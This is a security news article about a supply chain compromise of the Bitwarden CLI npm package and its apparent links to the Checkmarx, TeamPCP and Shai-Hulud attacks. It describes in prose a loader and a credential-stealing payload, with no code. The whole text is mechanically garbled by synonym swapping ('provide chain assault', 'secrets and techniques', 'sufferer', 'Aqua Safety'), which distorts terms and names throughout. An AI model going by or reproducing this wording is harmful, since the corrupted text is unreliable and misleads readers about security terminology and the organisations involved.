The Bitwarden command-line interface (CLI) NPM package deal was compromised in a provide chain assault that seems tied to earlier campaigns in opposition to the open supply software program (OSS) ecosystem.
Some of the standard open supply password administration platforms, with over 250,000 month-to-month downloads, Bitwarden permits enterprises to safe authentication with zero-knowledge encryption, password sharing, and coverage and credential administration.
On Thursday, a number of safety corporations warned that model 2026.4.0 of the Bitwarden CLI’s NPM package deal contained malicious code to fetch a JavaScript payload designed to steal credentials and secrets and techniques from sufferer machines.
The malicious package deal contained an altered execution path to run a malicious loader, obtain a Bun archive from GitHub, extract it, and execute the JavaScript payload.
The malware comprises three collectors focusing on secrets and techniques and tokens throughout Azure, AWS, GitHub, GCP, and NPM, in addition to SSH materials, shell historical past, and AI tooling configuration and MCP-related recordsdata, JFrog explains.
Moreover, the payload weaponizes the recognized GitHub tokens and abuses GitHub Actions to create repositories within the victims’ accounts, create branches, commit workflow recordsdata, and obtain the ensuing artifacts to extract extra secret materials.
The malware makes an attempt to exfiltrate the collected information by way of HTTPS however switches to GitHub paths if that fails.
“Essentially the most notable facet of this package deal is that it combines a provide chain compromise of a reliable CLI identification with a broad post-install secret theft framework. As an alternative of stopping at .npmrc or a single PAT, the malware systematically pivots throughout native credentials, CI secrets and techniques, GitHub repositories, and a number of cloud secret shops,” JFrog notes.
Bitwarden confirmed the provision chain hack, however famous that its investigation “discovered no proof that finish consumer vault information was accessed or in danger, or that manufacturing information or manufacturing methods had been compromised”.
The Checkmarx assault
The Bitwarden CLI compromise is linked to the current provide chain assault on Checkmarx, which hit the corporate’s public DockerHub KICS picture, public ast-github-action, VS Code extension, and Developer Help extension.
On April 22, Checkmarx confirmed the incident, sharing particulars on the malicious artifacts related to the assault and urging customers to right away rotate secrets and techniques and credentials in the event that they had been affected.
The malware used within the assault was designed to reap credentials and exfiltrate them to the checkmarx[.]cx area, or to repositories created beneath the sufferer’s GitHub account, a sample used within the Bitwarden provide chain assault as properly.
Socket’s evaluation of the 2 incidents additionally revealed the usage of the identical embedded payload construction, credential harvesting technique, propagation method, and Russian locale kill swap.
“The shared tooling strongly suggests a connection to the identical malware ecosystem, however the operational signatures differ in ways in which complicate attribution,” Socket notes.
The TeamPCP and Shai-Hulud connections
The complication, the cybersecurity agency explains, comes from the truth that the Checkmarx assault was claimed by TeamPCP, whereas the Bitwarden incident references the Shai-Hulud worm that crawled by NPM final 12 months.
Also called DeadCatx3, PCPcat, and ShellForce, TeamPCP is a hacking group lively since no less than 2024 that has been specializing in provide chain assaults for the previous 12 months.
The hacking group made headlines over the previous month after it compromised Aqua Safety’s Trivy vulnerability scanner to steal secrets and techniques and pivot throughout the OSS ecosystem and past.
As Socket notes, TeamPCP apparently claimed duty for the Checkmarx incident on social media, which didn’t come as a shock, because it had hit the corporate’s GitHub Actions and OpenVSX plugins as a part of the March marketing campaign.
Nevertheless, the Bitwarden payload comprises the “Shai-Hulud: The Third Coming” string, suggesting that the incident represents the most recent part of the earlier marketing campaign, OX Safety says.
Phrases resembling atreides, fremen, sandworm, and sardaukar had been additionally discovered within the code, which factors to a attainable overlap with the Shai-Hulud campaigns, nevertheless it doesn’t undoubtedly hyperlink TeamPCP to the earlier assaults, JFrog notes.
Shai-Hulud first emerged within the NPM registry in September, when it unfold to greater than 180 packages utilizing stolen developer credentials. Throughout a second wave in November, it contaminated over 640 packages.
“Person information is being publicly exfiltrated to GitHub, usually going undetected as a result of safety instruments sometimes don’t flag information being despatched there. This makes the danger considerably extra harmful: anybody looking out GitHub can probably discover and entry these credentials. At that time, delicate information is now not within the palms of a single menace actor; it’s uncovered to anybody,” mentioned OX Safety workforce lead Moshe Ben Siman Tov.
Associated: Are SBOMs Failing? Provide Chain Assaults Rise as Safety Groups Wrestle With SBOM Information
Associated: ‘By Design’ Flaw in MCP May Allow Widespread AI Provide Chain Assaults
Associated: OpenAI Impacted by North Korea-Linked Axios Provide Chain Hack
Associated: European Fee Confirms Information Breach Linked to Trivy Provide Chain Assault
![How creators and entrepreneurs are utilizing AI to hurry up & succeed [data]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/Untitled20design-Apr-07-2023-08-24-35-4586-PM-120x86.png)
